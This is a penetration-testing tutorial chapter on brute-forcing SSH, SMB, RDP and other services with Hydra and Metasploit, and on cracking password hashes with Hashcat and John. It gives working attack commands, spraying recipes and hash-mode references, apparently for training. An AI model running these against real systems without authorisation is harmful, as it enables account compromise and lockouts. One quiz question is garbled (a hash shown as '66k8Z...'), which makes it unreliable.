7.3 Network Service Brute-Forcing & Offline Hash Cracking

Key Takeaways

  • Online service brute-forcing directly tests credentials against running network daemons (SSH, FTP, SMB, RDP) using tools like THC-Hydra, Medusa, and Metasploit auxiliary scanners.

  • Online credential attacks carry significant operational risks, including account lockouts, defensive telemetry generation, and service denial, requiring disciplined threading and throttling.

  • Offline password cracking evaluates candidate passwords against extracted cryptographic hashes using John the Ripper and Hashcat, eliminating lockout risks and achieving immense calculation speeds.

  • Successful offline cracking relies on accurately determining the hash algorithm, character lengths, and salt formats to supply the correct hash mode in Hashcat (-m) or format tag in John (--format).

Last updated: October 2026

7.3 Network Service Brute-Forcing & Offline Hash Cracking

Authentication mechanisms form the primary gatekeeping layer for systems, administrative interfaces, and network services. During a penetration test, security professionals frequently uncover network services that are fully patched against known remote code execution vulnerabilities but remain vulnerable to authentication abuse due to weak, default, or reused credentials. In other scenarios, post-exploitation access on a single host yields encrypted or hashed credentials stored in memory, configuration files, or operating system databases.

To compromise additional network services and advance lateral movement, penetration testers utilize two distinct credential attack methodologies:

  1. Online Service Brute-Forcing: Directly transmitting authentication attempts over the network against active services (such as SSH, SMB, FTP, or RDP).
  2. Offline Hash Cracking: Utilizing high-performance local computing resources (CPUs and GPUs) to crack extracted cryptographic hashes without interacting with the target system.

Online Service Brute-Forcing Attacks

Online brute-forcing involves systematically submitting candidate usernames and passwords against an active network authentication daemon until a valid combination is accepted. Unlike offline attacks, online attacks generate network traffic, consume daemon resources, and interact directly with defensive controls.

+-----------------------------------------------------------------------------------------+
|                    ONLINE BRUTE-FORCE VS. OFFLINE CRACKING TAXONOMY                     |
+------------------------------------+----------------------------------------------------+
| ONLINE SERVICE BRUTE-FORCING       | OFFLINE HASH CRACKING                              |
+------------------------------------+----------------------------------------------------+
| Target: Live network daemon        | Target: Dumped cryptographic hash file             |
| Medium: Network protocol requests  | Medium: Local CPU / GPU calculation loops          |
| Speed: 1 to 50 attempts/second     | Speed: Millions to Billions of attempts/second     |
| Lockout Risk: HIGH                 | Lockout Risk: ZERO                                 |
| Network Noise: HIGH (Alerts IDS)   | Network Noise: ZERO (Passive local computation)    |
| Primary Tools: Hydra, Medusa, MSF  | Primary Tools: Hashcat, John the Ripper            |
+------------------------------------+----------------------------------------------------+

THC-Hydra Fundamentals & Protocol Support

THC-Hydra is the industry-standard multi-threaded network logon cracker. It supports an extensive array of network protocols, including SSH, FTP, SMB, RDP, MySQL, PostgreSQL, MSSQL, HTTP-POST-Form, POP3, IMAP, and Telnet.

Hydra utilizes specific command-line flags to control target specification, credential lists, concurrency, and output formatting:

  • -l <username>: Specifies a single static username to test.
  • -L <file>: Specifies a path to a file containing a list of target usernames.
  • -p <password>: Specifies a single static password to test against multiple users.
  • -P <file>: Specifies a path to a dictionary file (wordlist) containing candidate passwords.
  • -s <port>: Specifies a custom, non-standard service port.
  • -t <tasks>: Sets the number of parallel tasks (threads) to run concurrently.
  • -v / -V: Enables verbose or very verbose mode, displaying tested credential pairs in real-time.
  • -f: Instructs Hydra to halt execution immediately upon discovering the first valid pair for a target.
  • -o <file>: Writes identified valid credentials to an external output file.

Practical Hydra Command Recipes

# 1. SSH Brute-Forcing (Throttled to 4 threads to prevent daemon rate-limiting)
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50 -t 4 -f -vV

# 2. FTP Brute-Forcing with a username list and password wordlist
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.50 -t 16 -f

# 3. SMB Brute-Forcing against a Windows target
hydra -l Administrator -P /usr/share/wordlists/rockyou.txt smb://192.168.1.50 -t 4 -f

# 4. Remote Desktop (RDP) Brute-Forcing
hydra -l admin -P passwords.txt rdp://192.168.1.50 -t 4 -f

# 5. MySQL Database Brute-Forcing on default port 3306
hydra -l root -P passwords.txt mysql://192.168.1.50 -f

# 6. Password Spraying: Testing one common password across an entire user list
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p 'Winter2026!' 192.168.1.50 smb -t 4

Metasploit Auxiliary Brute-Force Scanners

The Metasploit Framework contains dedicated auxiliary modules designed for credential brute-forcing. A distinct advantage of using Metasploit modules is that they automatically record discovered credentials into the framework database (creds) and can be configured to automatically spawn an interactive session upon successful authentication:

# SSH Login Scanner
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.50
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ssh/ssh_login) > set CREATE_SESSION true
msf6 auxiliary(scanner/ssh/ssh_login) > run

# SMB Login Scanner
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.1.50
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser Administrator
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set RECORD_GUEST false
msf6 auxiliary(scanner/smb/smb_login) > run

Defensive Controls & Operational Risks

When conducting online brute-forcing in real-world environments, penetration testers must exercise strict operational discipline:

  1. Account Lockout Thresholds: Enterprise Windows Active Directory domains and Linux authentication systems (pam_faillock, pam_tally2) commonly enforce lockout policies (e.g., 3 to 5 failed attempts locks an account for 30 minutes). Aggressive brute-forcing can lock out business-critical user accounts, causing denial of service.
  2. Password Spraying vs. Brute-Forcing: To avoid triggering lockout policies, operators employ password spraying—submitting a single commonly used password (such as Company2026!) against hundreds of distinct usernames with substantial delays between attempts.
  3. Connection Overhead & Daemon Stability: Protocols like RDP and SSH consume substantial CPU and memory per connection handshake. Running Hydra with high task counts (-t 64) can exhaust target connection pools or crash legacy services.

Wordlists & Custom Dictionary Generation

Every password recovery attack relies heavily on the quality of its underlying wordlist. Penetration testers utilize both standard public dictionaries and custom, target-tailored wordlists.

Standard Wordlists: RockYou & SecLists

  • RockYou (rockyou.txt): The standard dictionary included in Kali Linux, extracted from a historical 2009 data breach containing over 14 million plain-text passwords. Located at /usr/share/wordlists/rockyou.txt.gz, it must be decompressed before initial use:
    # Decompress rockyou.txt on Kali Linux
    sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
    
    # Verify file extraction and line count (~14.3 million entries)
    wc -l /usr/share/wordlists/rockyou.txt
    
  • SecLists: A comprehensive collection of multiple types of lists, including usernames, passwords, URLs, sensitive data patterns, and fuzzing payloads. Located in /usr/share/seclists/.

Custom Dictionary Generation with CeWL & Crunch

Generic wordlists often fail against organizations that enforce strict password complexity rules. Attackers generate targeted dictionaries using reconnaissance data.

  • CeWL (Custom Word List Generator): Spiders an organization's target website, extracts unique words from the visible HTML content, strips tags, and compiles a dictionary of company-specific vocabulary, executive names, and product lines:
    # Spider website down to depth 2, extracting words with a minimum length of 6 characters
    cewl https://example.corp -d 2 -m 6 -w /tmp/corp_wordlist.txt
    
  • Crunch: Generates custom wordlists based on specific character sets, lengths, and patterns:
    # Generate all 8-character passwords starting with 'Pass' followed by 4 digits
    # Pattern symbols: @ = lowercase, , = uppercase, % = numbers, ^ = symbols
    crunch 8 8 -t Pass%%%% -o /tmp/pattern_passwords.txt
    

Identifying Cryptographic Hash Types

Before launching an offline cracking tool, the penetration tester must identify the cryptographic hashing algorithm used to produce the hash. Hash identification tools analyze the string length, character encoding, and syntax delimiters.

Identification Tools: hashid & hash-identifier

# Inspect a hash using hash-identifier
hash-identifier
# Paste hash: 8846f7eaee8fb117ad06bdd830b7586c
# [!] Possible Hashs: [MD5, Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))]

# Identify hash and output matching Hashcat mode numbers (-m) and John format flags
hashid -m 8846f7eaee8fb117ad06bdd830b7586c
# [+] MD5 [Hashcat Mode: 0]
# [+] NTLM [Hashcat Mode: 1000]

Common Hash Signatures & Delimiters

AlgorithmHex LengthSalting FormatSample Signature / Structure
MD532 hex charsUnsalted8846f7eaee8fb117ad06bdd830b7586c
SHA-140 hex charsUnsalted2fd4e1c67a2d28fced849ee1bb76e7391b93eb12
SHA-25664 hex charsUnsaltede3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
NTLM (Windows)32 hex charsUnsalted (MD4-based)b4b9b02e6f09a9bd760f388b67351e2b
MD5-Crypt (Linux)VariableSalted (\$1\$)\$1\$saltval\$jkH8sF9...
SHA-256-Crypt (Linux)VariableSalted (\$5\$)\$5\$saltval\$9K8xZ...
SHA-512-Crypt (Linux)VariableSalted (\$6\$)\$6\$rounds=5000\$salt\$AbCdEf...
Yescrypt (Linux modern)VariableSalted (\$y\$)\$y\$j9T\$salt\$...
NetNTLMv2VariableChallenge/Responseadmin::DOMAIN:challenge:response

In Unix /etc/shadow files, the identifier enclosed within the first pair of \$ characters specifies the hashing algorithm: \$1\$ denotes legacy MD5, \$5\$ denotes SHA-256, \$6\$ denotes SHA-512, and \$y\$ denotes yescrypt.


Offline Cracking with John the Ripper

John the Ripper (john) is a versatile, CPU-optimized offline password cracking tool capable of automatically detecting hash types and applying wordlist mutation rules.

Basic Wordlist Cracking Syntax

# Basic dictionary attack using rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Specify the explicit format flag to accelerate cracking
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt ntlm_hashes.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt md5_hashes.txt
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt shadow_hashes.txt

Inspecting Cracked Passwords

John stores cracked credentials in an internal database located at ~/.john/john.pot. To view cracked passwords without rerunning the attack:

# Display cracked accounts and cleartext passwords
john --show hashes.txt

# Filter output specifically by format
john --show --format=NT ntlm_hashes.txt

Applying Mangling Rules

When a standard wordlist fails, John's rule engine can mutate dictionary words by appending numbers, capitalizing letters, or substituting leetspeak characters (--rules):

# Apply standard mangling rules to the wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt --rules hashes.txt

Offline Cracking with Hashcat

Hashcat is the world's fastest password recovery utility, specifically engineered to leverage multi-threaded GPU hardware acceleration using OpenCL and CUDA. While John excels at rapid CPU-based cracking and automated format detection, Hashcat delivers orders of magnitude higher throughput when cracking unsalted hashes (like NTLM or MD5).

Hashcat Attack Modes (-a)

  • -a 0: Straight (Dictionary): Tests each entry from a specified wordlist directly against the hashes.
  • -a 1: Combination: Concatenates words from two dictionaries.
  • -a 3: Brute-Force / Mask: Generates candidates matching a defined pattern mask.

Hashcat Hash Modes (-m)

Unlike John, Hashcat requires the operator to explicitly specify the numeric hash mode using -m:

  • -m 0: MD5
  • -m 100: SHA-1
  • -m 1000: NTLM (Windows SAM database and Active Directory NTDS.dit)
  • -m 1400: SHA-256
  • -m 1800: SHA-512-Crypt ($6$, modern Linux /etc/shadow default)
  • -m 500: MD5-Crypt ($1$, legacy Linux)
  • -m 5600: NetNTLMv2 (Windows network authentication challenge/response)

Practical Hashcat Command Recipes

# 1. Straight dictionary attack against Windows NTLM hashes using rockyou.txt
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

# 2. Dictionary attack with the Best64 mutation rule set
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# 3. Cracking Linux /etc/shadow SHA-512 crypt hashes ($6$)
hashcat -m 1800 -a 0 shadow_hashes.txt /usr/share/wordlists/rockyou.txt

# 4. Mask Attack: Brute-forcing an 8-character password with uppercase, lowercase, and 4 digits
# Mask tokens: ?u = Upper, ?l = Lower, ?d = Digit, ?s = Special
hashcat -m 1000 -a 3 ntlm_hashes.txt ?u?l?l?l?d?d?d?d

# 5. Display cracked passwords from the hashcat.potfile
hashcat -m 1000 --show ntlm_hashes.txt

Cryptographic Hash Reference & Cracking Modes

Algorithm / TypeHashcat Mode (-m)John Format (--format)Typical Target Storage LocationSpeed / Cracking Feasibility
NTLM1000NTWindows SAM Hive, NTDS.ditExtremely Fast (Billions/sec on GPU; unsalted)
MD5 (Raw)0raw-md5Web applications, legacy databasesExtremely Fast (Billions/sec on GPU; unsalted)
SHA-1 (Raw)100raw-sha1Legacy codebases, Git repositoriesFast (Hundreds of Millions/sec on GPU)
SHA-256 (Raw)1400raw-sha256Modern web applications, API tokensFast (Hundreds of Millions/sec on GPU)
SHA-512-Crypt1800sha512cryptLinux /etc/shadow (\$6\$)Slow (Thousands of rounds of hashing; salted)
MD5-Crypt500md5cryptLegacy Linux /etc/shadow (\$1\$)Moderate (Salted, iterated MD5)
NetNTLMv25600netntlmv2Responder SMB/LLMNR capturesFast (Vulnerable to dictionary attacks)
Kerberos 5 TGS13100krb5tgsActive Directory KerberoastingModerate (Standard Active Directory wordlists)

Online Service Brute-Forcing Syntax Reference

ProtocolDefault PortPrimary ToolCommand Syntax ExampleRecommended Threading
SSH22Hydrahydra -l root -P rockyou.txt ssh://<IP> -t 4 -f-t 4 (Avoids daemon rate limits)
FTP21Hydrahydra -L users.txt -P rockyou.txt ftp://<IP> -t 16 -f-t 16 (FTP daemons handle concurrency)
SMB445Hydrahydra -l Administrator -P rockyou.txt smb://<IP> -t 4 -f-t 4 (Prevents IPC connection drops)
RDP3389Hydrahydra -l admin -P passwords.txt rdp://<IP> -t 4 -f-t 4 (RDP sessions are resource heavy)
MySQL3306Hydrahydra -l root -P rockyou.txt mysql://<IP> -t 8 -f-t 8 (Check for max_connections limit)
SSH22Metasploituse auxiliary/scanner/ssh/ssh_loginSet STOP_ON_SUCCESS true
SMB445Metasploituse auxiliary/scanner/smb/smb_loginSet CREATE_SESSION true
Test Your Knowledge

A penetration tester extracts a local password hash from a compromised Windows workstation's SAM database: 'b4b9b02e6f09a9bd760f388b67351e2b'. Which Hashcat command properly executes a straight dictionary attack against this hash using rockyou.txt?

A

hashcat -m 0 -a 3 sam_hashes.txt /usr/share/wordlists/rockyou.txt

B

hashcat -m 1800 -a 0 sam_hashes.txt /usr/share/wordlists/rockyou.txt

C

hashcat -m 1000 -a 0 sam_hashes.txt /usr/share/wordlists/rockyou.txt

D

hashcat -m 5600 -a 1 sam_hashes.txt /usr/share/wordlists/rockyou.txt

Test Your Knowledge

Which THC-Hydra command-line option instructs the utility to terminate testing against a target immediately upon finding the first valid username and password pair?

A

-vV

B

-f

C

-o

D

-s

Test Your Knowledge

During a penetration test on a Linux server, a tester inspects /etc/shadow and finds a password hash beginning with '66k8Z...'. Which cryptographic algorithm was used to generate this password hash?

A

MD5-crypt

B

SHA-256-crypt

C

Blowfish / bcrypt

D

SHA-512-crypt

Sections you finish are checked off in the contents.